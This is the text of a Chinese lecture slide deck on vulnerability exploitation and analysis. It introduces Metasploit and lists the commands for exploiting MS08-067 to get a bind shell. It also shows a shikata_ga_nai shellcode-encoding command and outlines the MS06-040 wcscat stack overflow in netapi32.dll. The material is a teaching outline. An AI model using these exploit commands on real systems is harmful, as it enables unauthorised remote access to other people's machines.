《漏洞利用与分析》课件.pptVIP

漏洞的利用分析与挖掘 汇报人：吴凯 漏洞的利用 Metosploit相关介绍 Metasploit是一个很强大的入侵工具集， 包含了900多种流行的操作系统及应用软件的漏洞，以及224个 shellcode 从它出生开始就是最强的漏洞利用和编写工具。 具体使用情况 以MS08-067漏洞为例，整个入侵过程由如下几个命令组成： use exploit/windows/ms08-067-netapi set payload windows/shell/bind-tcp set Rhost ip地址 set port 端口号 exploit shellcode的重编码 编码命令举例： use windows/exec set CMD notepad.exe generate -b \x00 -e shikata_ga_nai -t c 漏洞分析 此次分析以MS06-040这个典型的栈溢出为例 ms06-040的主要问题在于netapi32.dll这个动态链接库中的导出函数存在缓冲溢出，即netpwpathcanonicalize（）函数中的栈溢出漏洞 编译漏洞触发poc代码并运行后，就可以进行动态调试分析了 漏洞函数中存在着一次wcscat函数调用，它先将arg-4所指的字符串复制到栈中，再将arg-1的长字符串连接在末尾，导致栈溢出 漏洞触发过程 漏洞挖掘